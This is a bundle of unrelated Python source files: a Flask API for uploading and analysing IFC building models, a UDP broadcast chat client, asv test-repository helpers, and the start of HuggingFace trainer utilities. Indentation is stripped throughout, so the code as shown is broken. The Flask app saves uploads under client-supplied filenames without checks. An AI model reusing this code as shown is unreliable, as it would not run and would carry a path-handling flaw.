# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #
# SOFTWARE. #
# #
##################################################################################
from __future__ import print_function
import os
import json
import threading
import logging
import shutil
from collections import namedtuple
from werkzeug.middleware.proxy_fix import ProxyFix
from werkzeug.datastructures import FileStorage
from flask import Flask, request, send_file, render_template, abort, jsonify, redirect, url_for, make_response
from flask_cors import CORS
from flasgger import Swagger
import utils
import worker
import database
import GEOBIM_Tool as geobim
application = Flask(__name__)
DEVELOPMENT = os.environ.get('environment', 'production').lower() == 'development'
if not DEVELOPMENT and os.path.exists("/version"):
PIPELINE_POSTFIX = "." + open("/version").read().strip()
else:
PIPELINE_POSTFIX = ""
if not DEVELOPMENT:
# In some setups this proved to be necessary for url_for() to pick up HTTPS
application.wsgi_app = ProxyFix(application.wsgi_app, x_proto=1)
if os.environ.get("FLASK_ENV") == "development":
MODELS_PATH = "../models-preloaded/"
IDS_PATH = MODELS_PATH + "ids_development.json"
else:
MODELS_PATH = "./models-preloaded/"
IDS_PATH = MODELS_PATH + "ids_production.json"
CORS(application)
application.config['SWAGGER'] = {
'title': os.environ.get('APP_NAME', 'ifc-pipeline request API'),
'openapi': '3.0.2',
"specs": [
{
"version": "0.1",
"title": os.environ.get('APP_NAME', 'ifc-pipeline request API'),
"description": os.environ.get('APP_NAME', 'ifc-pipeline request API'),
"endpoint": "spec",
"route": "/apispec",
},
]
}
swagger = Swagger(application)
if not DEVELOPMENT:
from redis import Redis
from rq import Queue
q = Queue(connection=Redis(host=os.environ.get("REDIS_HOST", "localhost")), default_timeout=3600)
@application.route('/', methods=['GET'])
def get_main():
return render_template('index.html')
def process_upload(filewriter, callback_url=None):
id = utils.generate_id()
d = utils.storage_dir_for_id(id)
os.makedirs(d)
filewriter(os.path.join(d, id + ".ifc"))
session = database.Session()
session.add(database.model(id, ''))
session.commit()
session.close()
if DEVELOPMENT:
t = threading.Thread(target=lambda: worker.process(id, callback_url))
t.start()
else:
q.enqueue(worker.process, id, callback_url)
return id
def process_upload_multiple(files, callback_url=None):
id = utils.generate_id()
d = utils.storage_dir_for_id(id)
os.makedirs(d)
file_id = 0
paths = []
session = database.Session()
m = database.model(id, '')
session.add(m)
for file in files:
fn = file.filename
filewriter = lambda fn: file.save(fn)
path = os.path.join(d, id + "_" + str(file_id) + ".ifc")
filewriter(path)
paths.append(path)
file_id += 1
m.files.append(database.file(id, ''))
analyser = geobim.analyser()
analyser.load(path)
analysers[id] = analyser
session.commit()
session.close()
if DEVELOPMENT:
t = threading.Thread(target=lambda: worker.process(id, callback_url))
t.start()
else:
q.enqueue(worker.process, id, callback_url)
settings_path = IDS_PATH
with open(settings_path, "r") as settings_file:
settings = json.load(settings_file)
settings[file.filename] = {}
settings[file.filename]["id"] = id
settings[file.filename]["path"] = paths[0]
os.remove(settings_path)
with open(settings_path, 'w') as f:
json.dump(settings, f)
return id
@application.route('/preloaded_models_info', methods=['GET'])
def preloaded_models_info():
with open(IDS_PATH, 'r') as f:
settings = json.load(f)
fns = list(settings.keys())
return jsonify(fns)
@application.route('/load_preloaded_file/<fn>', methods=['GET'])
def load_preloaded_file(fn):
ids_f = open(IDS_PATH)
ids = json.load(ids_f)
id = ids[fn]["id"]
return id
@application.route('/init_preloaded_files', methods=['GET'])
def init_preloaded_files():
if DEVELOPMENT:
t = threading.Thread(target=preload_files)
t.start()
else:
q.enqueue(preload_files)
return jsonify("success")
def preload_files():
path = MODELS_PATH
fns = [fn for fn in os.listdir(path) if os.path.isfile(os.path.join(path, fn))]
settings_path = path + "ids.json"
with open(settings_path, "r") as settings_file:
settings = json.load(settings_file)
for fn in fns:
if fn[-4:] == ".ifc" and fn not in settings.keys():
f = open(path + fn, 'rb')
file = FileStorage(f)
id = process_upload_multiple([file])
d = utils.storage_dir_for_id(id)
f.close()
settings[fn] = {}
settings[fn]["id"] = id
settings[fn]["path"] = path + fn
os.remove(settings_path)
with open(settings_path, 'w') as f:
json.dump(settings, f)
def init_analyser(id):
global analysers
print("Init analyser, checking if exists...")
settings_path = IDS_PATH
with open(settings_path, "r") as settings_file:
settings = json.load(settings_file)
for model in settings:
if settings[model]["id"] == id:
print("Creating analyser for " + model)
analyser = geobim.analyser()
analyser.load(settings[model]["path"])
analysers[id] = analyser
print("Finished creating analyser for " + model)
def init_analysers():
global analysers
settings_path = IDS_PATH
f = open(settings_path, "r")
settings = json.load(f)
print(settings)
f.close()
for model in settings:
if settings[model]["id"] not in analysers:
print("Create analyser for " + model)
analyser = geobim.analyser()
analyser.load(settings[model]["path"])
analysers[settings[model]["id"]] = analyser
print("Finished creating analyser for " + model)
else:
print("Analyser for " + model + " already exists")
# @application.route('/init_all_analysers', methods=['GET'])
def init_all_analysers():
t = threading.Thread(target=init_analysers)
t.start()
"""
if DEVELOPMENT:
t = threading.Thread(target=init_analysers)
t.start()
else:
q.enqueue(init_analysers)
"""
# return jsonify("success")
@application.route('/upload_ifc', methods=['POST'])
def put_main():
"""
Upload model
---
requestBody:
content:
multipart/form-data:
schema:
type: object
properties:
ifc:
type: string
format: binary
responses:
'200':
description: redirect
"""
ids = []
files = []
for key, f in request.files.items():
if key.startswith('file'):
if f.filename[-4:] != ".ifc":
return "Invalid file", 400
files.append(f)
id = process_upload_multiple(files)
d = utils.storage_dir_for_id(id)
url = url_for('get_progress', id=id)
if request.accept_mimetypes.accept_json:
return jsonify({"url": url})
else:
return redirect(url)
@application.route('/p/<id>', methods=['GET'])
def check_viewer(id):
if not utils.validate_id(id):
abort(404)
return render_template('progress.html', id=id)
@application.route('/pp/<id>', methods=['GET'])
def get_progress(id):
if not utils.validate_id(id):
abort(404)
session = database.Session()
model = session.query(database.model).filter(database.model.code == id).all()[0]
session.close()
return jsonify({"progress": model.progress})
@application.route('/log/<id>.<ext>', methods=['GET'])
def get_log(id, ext):
log_entry_type = namedtuple('log_entry_type', ("level", "message", "instance", "product"))
if ext not in {'html', 'json'}:
abort(404)
if not utils.validate_id(id):
abort(404)
logfn = os.path.join(utils.storage_dir_for_id(id), "log.json")
if not os.path.exists(logfn):
abort(404)
if ext == 'html':
log = []
for ln in open(logfn):
l = ln.strip()
if l:
log.append(json.loads(l, object_hook=lambda d: log_entry_type(
*(d.get(k, '') for k in log_entry_type._fields))))
return render_template('log.html', id=id, log=log)
else:
return send_file(logfn, mimetype='text/plain')
@application.route('/v/<id>', methods=['GET'])
def get_viewer(id):
if not utils.validate_id(id):
abort(404)
d = utils.storage_dir_for_id(id)
ifc_files = [os.path.join(d, name) for name in os.listdir(d) if
os.path.isfile(os.path.join(d, name)) and name.endswith('.ifc')]
if len(ifc_files) == 0:
abort(404)
failedfn = os.path.join(utils.storage_dir_for_id(id), "failed")
if os.path.exists(failedfn):
return render_template('error.html', id=id)
for ifc_fn in ifc_files:
glbfn = ifc_fn.replace(".ifc", ".glb")
if not os.path.exists(glbfn):
abort(404)
n_files = len(ifc_files) if "_" in ifc_files[0] else None
return render_template(
'viewer.html',
id=id,
n_files=n_files,
postfix=PIPELINE_POSTFIX
)
@application.route('/m/<fn>', methods=['GET'])
def get_model(fn):
"""
Get model component
---
parameters:
- in: path
name: fn
required: true
schema:
type: string
description: Model id and part extension
example: BSESzzACOXGTedPLzNiNklHZjdJAxTGT.glb
"""
id, ext = fn.split('.', 1)
if not utils.validate_id(id):
abort(404)
if ext not in {"xml", "svg", "glb", "unoptimized.glb"}:
abort(404)
path = utils.storage_file_for_id(id, ext)
if not os.path.exists(path):
abort(404)
if os.path.exists(path + ".gz"):
import mimetypes
response = make_response(
send_file(path + ".gz",
mimetype=mimetypes.guess_type(fn, strict=False)[0])
)
response.headers['Content-Encoding'] = 'gzip'
return response
else:
return send_file(path)
@application.route('/analysis/<id>/wkt/<floornumber>', methods=['GET'])
def floor_wkt(id, floornumber):
result = analysers[id].footprintWKT(floornumber)
return jsonify({"wkt": result})
@application.route('/analysis/<id>/overhangsingle/<floornumber>', methods=['GET'])
def overhangsingle(id, floornumber):
result = analysers[id].OverhangOneFloor(floornumber)
return jsonify(result)
@application.route('/analysis/<id>/overhangall', methods=['GET'])
def overhangall(id):
result = analysers[id].OverhangAll_new()
return jsonify(result)
@application.route('/analysis/<id>/height', methods=['GET'])
def height(id):
result = analysers[id].GetHeight()
return result
@application.route('/analysis/<id>/baseheight/<floornumber>', methods=['GET'])
def baseheight(id, floornumber):
result = analysers[id].GetBaseHeight(floornumber)
return result
@application.route('/analysis/<id>/overlapsingle/<floornumber>', methods=['GET'])
def overlapsingle(id, floornumber):
result = analysers[id].OverlapOneFloor(floornumber)
return result
@application.route('/analysis/<id>/overlapall', methods=['GET'])
def overlapall(id):
result = analysers[id].OverlapAll()
return result
@application.route('/analysis/<id>/overlapsinglebbox/<floornumber>', methods=['GET'])
def overlapsinglebbox(id, floornumber):
result = analysers[id].OverlapOneFloorOBB(floornumber)
return result
@application.route('/analysis/<id>/overlapallbbox', methods=['GET'])
def overlapallbbox(id):
result = analysers[id].OverlapAllOBB()
return result
@application.route('/analysis/<id>/setbasefloornum/<floornumber>', methods=['GET'])
def setbasefloornum(id, floornumber):
analysers[id].setBaseFloornum(floornumber)
return "success"
@application.route('/analysis/<id>/addgeoreferencepoint/<xyz>', methods=['GET'])
def addgeoreferencepoint(id, x, y, z):
analysers[id].setBaseFloornum()
return "success"
@application.route('/analysis/<id>/setoverhangdir/<direction>', methods=['GET'])
def setoverhangdir(id, direction):
analysers[id].setOverhangdir(direction)
return "success"
@application.route('/analysis/<id>/setoverlapparameters/<s>/<dbscan>/<k>', methods=['GET'])
def setoverlapparameters(id, s, dbscan, k):
analysers[id].setOverlapParameters(s, dbscan, k)
return "success"
@application.route('/analysis/<id>/overhangroads/<floornum>/<guidelines>', methods=['GET'])
def overhangroads(id, floornum, guidelines):
guidelinesParsed = {}
for guideline in guidelines.split('|'):
entry = guideline.split(": ")
guidelinesParsed[entry[0]] = float(entry[1])
ifc_path = None
ids = open(IDS_PATH, 'r')
settings = json.load(ids)
ids.close()
for k, v in settings.items():
if v["id"] == id:
ifc_path = v["path"]
break
if floornum != "none":
result = analysers[id].overhangRoads(guidelinesParsed, int(floornum))
else:
result = analysers[id].overhangRoads(guidelinesParsed)
return jsonify(result)
@application.route('/analysis/<id>/overhangroadsalphashape/<floornum>/<alpha>/<guidelines>', methods=['GET'])
def overhangroadsalphashape(id, floornum, alpha, guidelines):
alpha = float(alpha)
guidelinesParsed = {}
for guideline in guidelines.split('|'):
entry = guideline.split(": ")
guidelinesParsed[entry[0]] = float(entry[1])
ifc_path = None
ids = open(IDS_PATH, 'r')
settings = json.load(ids)
ids.close()
for k, v in settings.items():
if v["id"] == id:
ifc_path = v["path"]
break
if floornum != "none":
result = analysers[id].overhangRoadsAlphaShape(guidelinesParsed, alpha, int(floornum))
else:
result = analysers[id].overhangRoadsAlphaShape(guidelinesParsed, alpha)
return jsonify(result)
@application.route('/analysis/<id>/heightcheck/<max>', methods=['GET'])
def heightcheck(id, max):
result = analysers[id].heightCheck(float(max))
return jsonify(result)
@application.route('/analysis/<id>/boundarycheck', methods=['GET'])
def boundarycheck(id):
result = analysers[id].boundaryCheck()
return jsonify(result)
@application.route('/analysis/<id>/getgeoref', methods=['GET'])
def getgeoref(id):
result = analysers[id].getGeoref()
if result != None:
return jsonify(result)
else:
return "No georeferencing information in IFC file", 400
@application.route('/analysis/<id>/parking/<zone>', methods=['POST', 'GET'])
def parking(id, zone):
ifc_path = None
ids = open(IDS_PATH, 'r')
settings = json.load(ids)
ids.close()
for k, v in settings.items():
if v["id"] == id:
ifc_path = v["path"]
break
if request.method == 'GET':
result = analysers[id].parkingCalculate(ifc_path, zone)
elif request.method == 'POST':
result = None
for key,f in request.files.items():
if key.startswith('file') and key.endswith('xlsx'):
print(f.filename)
fn = f.filename
p = os.path.join("/data/", fn)
f.save(p)
result = analysers[id].parkingCalculate(ifc_path, zone)
if result:
return result
else:
return "Error", 400
if __name__ != '__main__':
gunicorn_logger = logging.getLogger('gunicorn.error')
application.logger.handlers = gunicorn_logger.handlers
application.logger.setLevel(gunicorn_logger.level)
# Move preloaded data to correct folder because it doesn't work doing it directly in the Dockerfile for some reason
if os.environ.get("FLASK_ENV") != "development":
shutil.copytree("/www/models-preloaded/G", "/data/G", dirs_exist_ok=True)
analysers = {}
init_all_analysers()
print("Initialising analysers done")
try:
import routes
except ImportError as e:
pass
|
udpBroadcast.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
Main entrypoint for UDP chat test.
'''
'''
MIT License
Copyright (c) 2019 Simon Lövgren
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import argparse
import socket
import threading
import signal
globalStop = threading.Event()
class EchoClient():
def __init__( self, port ):
self.port = port
# Socket
self.socket = socket.socket( socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP )
self.socket.setsockopt( socket.SOL_SOCKET, socket.SO_BROADCAST, 1 )
self.socket.settimeout( 0.01 )
# Recv-thread
self.receive_thread = threading.Thread( target = self._receive_thread )
self.receive_thread.daemon = True
self.receive_thread.start()
def _receive_thread( self ):
while ( not globalStop.is_set() ):
try:
data, addr = self.socket.recvfrom( 2048 )
if ( len( data ) > 0 ):
print( f'-> {data}' )
except socket.timeout as e:
# Just a timeout
pass
except socket.error as e:
print( f'Socket error: [{e}]' )
def run( self ):
while( not globalStop.is_set() ):
try:
data = input()
self.socket.sendto( data.encode(), ( '<broadcast>', self.port ) )
except socket.error as e:
print( f'Socket error: [{e}]' )
except EOFError as e:
pass
'''
Command line stuff
'''
def killHandler( signum, stackFrame ):
print( f'Exiting.' )
# Signal kill event
globalStop.set()
def main( port ):
print( f'Sending to port {port}')
# Register SIGTERM and SIGINT handler
signal.signal( signal.SIGINT, killHandler )
signal.signal( signal.SIGTERM, killHandler )
client = EchoClient( port )
client.run()
def parseargs():
parser = argparse.ArgumentParser( description = 'UDP broadcast client.' )
# remote client to connect to
parser.add_argument(
'--port'
,action = 'store'
,metavar = '<port>'
,help = 'Port to broadcast to.'
,type = int
,default = '8000'
)
return parser.parse_args()
pass
if __name__ == "__main__":
args = parseargs()
main(
args.port
)
|
tools.py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, unicode_literals, print_function
"""
This file contains utilities to generate test repositories.
"""
import datetime
import io
import os
import threading
import time
import six
import tempfile
import textwrap
import sys
from os.path import abspath, join, dirname, relpath, isdir
from contextlib import contextmanager
from hashlib import sha256
from six.moves import SimpleHTTPServer
import pytest
try:
import hglib
except ImportError as exc:
hglib = None
from asv import util
from asv import commands
from asv import config
from asv.commands.preview import create_httpd
from asv.repo import get_repo
from asv.results import Results
# Two Python versions for testing
PYTHON_VER1 = "{0[0]}.{0[1]}".format(sys.version_info)
if sys.version_info < (3,):
PYTHON_VER2 = "3.6"
else:
PYTHON_VER2 = "2.7"
# Installable library versions to use in tests
SIX_VERSION = "1.10"
COLORAMA_VERSIONS = ["0.3.7", "0.3.9"]
try:
import selenium
from selenium.common.exceptions import TimeoutException
HAVE_WEBDRIVER = True
except ImportError:
HAVE_WEBDRIVER = False
WAIT_TIME = 20.0
def run_asv(*argv):
parser, subparsers = commands.make_argparser()
args = parser.parse_args(argv)
return args.func(args)
def run_asv_with_conf(conf, *argv, **kwargs):
assert isinstance(conf, config.Config)
parser, subparsers = commands.make_argparser()
args = parser.parse_args(argv)
if sys.version_info[0] >= 3:
cls = args.func.__self__
else:
cls = args.func.im_self
return cls.run_from_conf_args(conf, args, **kwargs)
# These classes are defined here, rather than using asv/plugins/git.py
# and asv/plugins/mercurial.py since here we need to perform write
# operations to the repository, and the others should be read-only for
# safety.
class Git(object):
def __init__(self, path):
self.path = abspath(path)
self._git = util.which('git')
self._fake_date = datetime.datetime.now()
def run_git(self, args, chdir=True, **kwargs):
if chdir:
cwd = self.path
else:
cwd = None
kwargs['cwd'] = cwd
return util.check_output(
[self._git] + args, **kwargs)
def init(self):
self.run_git(['init'])
self.run_git(['config', 'user.email', 'robot@asv'])
self.run_git(['config', 'user.name', 'Robotic Swallow'])
def commit(self, message, date=None):
if date is None:
self._fake_date += datetime.timedelta(seconds=1)
date = self._fake_date
self.run_git(['commit', '--date', date.isoformat(),
'-m', message])
def tag(self, number):
self.run_git(['tag', '-a', '-m', 'Tag {0}'.format(number),
'tag{0}'.format(number)])
def add(self, filename):
self.run_git(['add', relpath(filename, self.path)])
def checkout(self, branch_name, start_commit=None):
args = ["checkout"]
if start_commit is not None:
args.extend(["-b", branch_name, start_commit])
else:
args.append(branch_name)
self.run_git(args)
def merge(self, branch_name, commit_message=None):
self.run_git(["merge", "--no-ff", "--no-commit", "-X", "theirs", branch_name])
if commit_message is None:
commit_message = "Merge {0}".format(branch_name)
self.commit(commit_message)
def get_hash(self, name):
return self.run_git(['rev-parse', name]).strip()
def get_branch_hashes(self, branch=None):
if branch is None:
branch = "master"
return [x.strip() for x in self.run_git(['rev-list', branch]).splitlines()
if x.strip()]
def get_commit_message(self, commit_hash):
return self.run_git(["log", "-n", "1", "--format=%s", commit_hash]).strip()
_hg_config = """
[ui]
username = Robotic Swallow <robot@asv>
"""
class Hg(object):
encoding = 'utf-8'
def __init__(self, path):
self._fake_date = datetime.datetime.now()
self.path = abspath(path)
def init(self):
hglib.init(self.path)
with io.open(join(self.path, '.hg', 'hgrc'), 'w', encoding="utf-8") as fd:
fd.write(_hg_config)
self._repo = hglib.open(self.path.encode(sys.getfilesystemencoding()),
encoding=self.encoding)
def commit(self, message, date=None):
if date is None:
self._fake_date += datetime.timedelta(seconds=1)
date = self._fake_date
date = "{0} 0".format(util.datetime_to_timestamp(date))
self._repo.commit(message.encode(self.encoding),
date=date.encode(self.encoding))
def tag(self, number):
self._fake_date += datetime.timedelta(seconds=1)
date = "{0} 0".format(util.datetime_to_timestamp(self._fake_date))
self._repo.tag(
['tag{0}'.format(number).encode(self.encoding)],
message="Tag {0}".format(number).encode(self.encoding),
date=date.encode(self.encoding))
def add(self, filename):
self._repo.add([filename.encode(sys.getfilesystemencoding())])
def checkout(self, branch_name, start_commit=None):
if start_commit is not None:
self._repo.update(start_commit.encode(self.encoding))
self._repo.branch(branch_name.encode(self.encoding))
else:
self._repo.update(branch_name.encode(self.encoding))
def merge(self, branch_name, commit_message=None):
self._repo.merge(branch_name.encode(self.encoding),
tool=b"internal:other")
if commit_message is None:
commit_message = "Merge {0}".format(branch_name)
self.commit(commit_message)
def get_hash(self, name):
log = self._repo.log(name.encode(self.encoding), limit=1)
if log:
return log[0][1].decode(self.encoding)
return None
def get_branch_hashes(self, branch=None):
if branch is None:
branch = "default"
log = self._repo.log('sort(ancestors({0}), -rev)'.format(branch).encode(self.encoding))
return [entry[1].decode(self.encoding) for entry in log]
def get_commit_message(self, commit_hash):
return self._repo.log(commit_hash.encode(self.encoding))[0].desc.decode(self.encoding)
def copy_template(src, dst, dvcs, values):
for root, dirs, files in os.walk(src):
for dir in dirs:
src_path = join(root, dir)
dst_path = join(dst, relpath(src_path, src))
if not isdir(dst_path):
os.makedirs(dst_path)
for file in files:
src_path = join(root, file)
dst_path = join(dst, relpath(src_path, src))
try:
with io.open(src_path, 'r', encoding='utf-8') as fd:
content = fd.read()
except UnicodeDecodeError:
# File is some sort of binary file... just copy it
# directly with no template substitution
with io.open(src_path, 'rb') as fd:
content = fd.read()
with io.open(dst_path, 'wb') as fd:
fd.write(content)
else:
content = content.format(**values)
with io.open(dst_path, 'w', encoding='utf-8') as fd:
fd.write(content)
dvcs.add(dst_path)
def generate_test_repo(tmpdir, values=[0], dvcs_type='git',
extra_branches=(), subdir=''):
"""
Generate a test repository
Parameters
----------
tmpdir
Repository directory
values : list
List of values to substitute in the template
dvcs_type : {'git', 'hg'}
What dvcs to use
extra_branches : list of (start_commit, branch_name, values)
Additional branches to generate in the repository.
For branch start commits, use relative references, e.g.,
the format 'master~10' or 'default~10' works both for Hg
and Git.
subdir
A relative subdirectory inside the repository to copy the
test project into.
Returns
-------
dvcs : Git or Hg
"""
if dvcs_type == 'git':
dvcs_cls = Git
elif dvcs_type == 'hg':
dvcs_cls = Hg
else:
raise ValueError("Unknown dvcs type {0}".format(dvcs_type))
template_path = join(dirname(__file__), 'test_repo_template')
if not os.path.isdir(tmpdir):
os.makedirs(tmpdir)
dvcs_path = tempfile.mkdtemp(prefix='test_repo', dir=tmpdir)
dvcs = dvcs_cls(dvcs_path)
dvcs.init()
project_path = os.path.join(dvcs_path, subdir)
if not os.path.exists(project_path):
os.makedirs(project_path)
for i, value in enumerate(values):
mapping = {
'version': i,
'dummy_value': value
}
copy_template(template_path, project_path, dvcs, mapping)
dvcs.commit("Revision {0}".format(i))
dvcs.tag(i)
if extra_branches:
for start_commit, branch_name, values in extra_branches:
dvcs.checkout(branch_name, start_commit)
for i, value in enumerate(values):
mapping = {
'version': "{0}".format(i),
'dummy_value': value
}
copy_template(template_path, project_path, dvcs, mapping)
dvcs.commit("Revision {0}.{1}".format(branch_name, i))
return dvcs
def generate_repo_from_ops(tmpdir, dvcs_type, operations):
if dvcs_type == 'git':
dvcs_cls = Git
elif dvcs_type == 'hg':
dvcs_cls = Hg
else:
raise ValueError("Unknown dvcs type {0}".format(dvcs_type))
template_path = join(dirname(__file__), 'test_repo_template')
if not os.path.isdir(tmpdir):
os.makedirs(tmpdir)
dvcs_path = tempfile.mkdtemp(prefix='test_repo', dir=tmpdir)
dvcs = dvcs_cls(dvcs_path)
dvcs.init()
version = 0
for op in operations:
if op[0] == "commit":
copy_template(template_path, dvcs_path, dvcs, {
"version": version,
"dummy_value": op[1],
})
version += 1
dvcs.commit("Revision {0}".format(version), *op[2:])
elif op[0] == "checkout":
dvcs.checkout(*op[1:])
elif op[0] == "merge":
dvcs.merge(*op[1:])
else:
raise ValueError("Unknown dvcs operation {0}".format(op))
return dvcs
def generate_result_dir(tmpdir, dvcs, values, branches=None):
result_dir = join(tmpdir, "results")
os.makedirs(result_dir)
html_dir = join(tmpdir, "html")
machine_dir = join(result_dir, "tarzan")
os.makedirs(machine_dir)
if branches is None:
branches = [None]
conf = config.Config.from_json({
'results_dir': result_dir,
'html_dir': html_dir,
'repo': dvcs.path,
'project': 'asv',
'branches': branches or [None],
})
repo = get_repo(conf)
util.write_json(join(machine_dir, "machine.json"), {
'machine': 'tarzan',
'version': 1,
})
timestamp = datetime.datetime.utcnow()
benchmark_version = sha256(os.urandom(16)).hexdigest()
params = None
param_names = None
for commit, value in values.items():
if isinstance(value, dict):
params = value["params"]
result = Results({"machine": "tarzan"}, {}, commit,
repo.get_date_from_name(commit), "2.7", None)
value = {
'result': [value],
'params': [],
'started_at': timestamp,
'ended_at': timestamp,
'stats': None,
'samples': None,
'number': None,
}
result.add_result("time_func", value, benchmark_version)
result.save(result_dir)
if params:
param_names = ["param{}".format(k) for k in range(len(params))]
util.write_json(join(result_dir, "benchmarks.json"), {
"time_func": {
"name": "time_func",
"params": params or [],
"param_names": param_names or [],
"version": benchmark_version,
}
}, api_version=1)
return conf
@pytest.fixture(scope="session")
def browser(request, pytestconfig):
"""
Fixture for Selenium WebDriver browser interface
"""
driver_str = pytestconfig.getoption('webdriver')
if driver_str == "None":
pytest.skip("No webdriver selected for tests (use --webdriver).")
# Evaluate the options
def FirefoxHeadless():
from selenium.webdriver.firefox.options import Options
options = Options()
options.add_argument("-headless")
return selenium.webdriver.Firefox(firefox_options=options)
def ChromeHeadless():
options = selenium.webdriver.ChromeOptions()
options.add_argument('headless')
return selenium.webdriver.Chrome(chrome_options=options)
ns = {}
six.exec_("import selenium.webdriver", ns)
six.exec_("from selenium.webdriver import *", ns)
ns['FirefoxHeadless'] = FirefoxHeadless
ns['ChromeHeadless'] = ChromeHeadless
create_driver = ns.get(driver_str, None)
if create_driver is None:
src = "def create_driver():\n"
src += textwrap.indent(driver_str, " ")
six.exec_(src, ns)
create_driver = ns['create_driver']
# Create the browser
browser = create_driver()
# Set timeouts
browser.set_page_load_timeout(WAIT_TIME)
browser.set_script_timeout(WAIT_TIME)
# Clean up on fixture finalization
def fin():
browser.quit()
request.addfinalizer(fin)
# Set default time to wait for AJAX requests to complete
browser.implicitly_wait(WAIT_TIME)
return browser
@contextmanager
def preview(base_path):
"""
Context manager for ASV preview web server. Gives the base URL to use.
Parameters
----------
base_path : str
Path to serve files from
"""
class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def translate_path(self, path):
# Don't serve from cwd, but from a different directory
path = SimpleHTTPServer.SimpleHTTPRequestHandler.translate_path(self, path)
path = os.path.join(base_path, os.path.relpath(path, os.getcwd()))
return util.long_path(path)
httpd, base_url = create_httpd(Handler)
def run():
try:
httpd.serve_forever()
except:
import traceback
traceback.print_exc()
return
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
try:
yield base_url
finally:
# Stop must be run in a separate thread, because
# httpd.shutdown blocks until serve_forever returns. We don't
# want to block here --- it appears in some environments
# problems shutting down the server may arise.
stopper = threading.Thread(target=httpd.shutdown)
stopper.daemon = True
stopper.start()
stopper.join(5.0)
def get_with_retry(browser, url):
for j in range(2):
try:
return browser.get(url)
except TimeoutException:
time.sleep(2)
return browser.get(url)
|
trainer_utils.py
|
# coding=utf-8
# Copyright 2020-present the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Utilities for the Trainer and TFTrainer class. Should be independent from PyTorch and TensorFlow.
"""
import copy
import gc
import inspect
import os
import random
import re
import threading
import time
from typing import Any, Dict, NamedTuple, Optional, Tuple, Union
import numpy as np
from .file_utils import (
ExplicitEnum,
is_psutil_available,
is_sagemaker_dp_enabled,
is_tf_available,
is_torch_available,
is_torch_cuda_available,
is_torch_tpu_available,
)
if is_torch_available():
import torch
if is_tf_available():
import tensorflow as tf
def set_seed(seed: int):
"""
Helper function for reproducible behavior to set the seed in ``random``, ``numpy``, ``torch`` and/or ``tf`` (if
installed).
Args:
seed (:obj:`int`): The seed to set.
"""
random.seed(seed)
np.random.seed(seed)
if is_torch_available():
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
# ^^ safe to call this function even if cuda is not available
if is_tf_available():
tf.random.set_seed(seed)
class EvalPrediction(NamedTuple):
"""
Evaluation output (always contains labels), to be used to compute metrics.
Parameters:
predictions (:obj:`np.ndarray`): Predictions of the model.
label_ids (:obj:`np.ndarray`): Targets to be matched.
"""
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: np.ndarray
class EvalLoopOutput(NamedTuple):
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: Optional[np.ndarray]
metrics: Optional[Dict[str, float]]
num_samples: Optional[int]
class PredictionOutput(NamedTuple):
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: Optional[np.ndarray]
metrics: Optional[Dict[str, float]]
class TrainOutput(NamedTuple):
global_step: int
training_loss: float
metrics: Dict[str, float]
PREFIX_CHECKPOINT_DIR = "checkpoint"
_re_checkpoint = re.compile(r"^" + PREFIX_CHECKPOINT_DIR + r"\-(\d+)$")
def get_last_checkpoint(folder):
content = os.listdir(folder)
checkpoints = [
path
for path in content
if _re_checkpoint.search(path) is not None and os.path.isdir(os.path.join(folder, path))
]
if len(checkpoints) == 0:
return
return os.path.join(folder, max(checkpoints, key=lambda x: int(_re_checkpoint.search(x).groups()[0])))
class IntervalStrategy(ExplicitEnum):
NO = "no"
STEPS = "steps"
EPOCH = "epoch"
class EvaluationStrategy(ExplicitEnum):
NO = "no"
STEPS = "steps"
EPOCH = "epoch"
class BestRun(NamedTuple):
"""
The best run found by an hyperparameter search (see :class:`~transformers.Trainer.hyperparameter_search`).
Parameters:
run_id (:obj:`str`):
The id of the best run (if models were saved, the corresponding checkpoint will be in the folder ending
with run-{run_id}).
objective (:obj:`float`):
The objective that was obtained for this run.
hyperparameters (:obj:`Dict[str, Any]`):
The hyperparameters picked to get this run.
"""
run_id: str
objective: float
hyperparameters: Dict[str, Any]
def default_compute_objective(metrics: Dict[str, float]) -> float:
"""
The default objective to maximize/minimize when doing an hyperparameter search. It is the evaluation loss if no
metrics are provided to the :class:`~transformers.Trainer`, the sum of all metrics otherwise.
Args:
metrics (:obj:`Dict[str, float]`): The metrics returned by the evaluate method.
Return:
:obj:`float`: The objective to minimize or maximize
"""
metrics = copy.deepcopy(metrics)
loss = metrics.pop("eval_loss", None)
_ = metrics.pop("epoch", None)
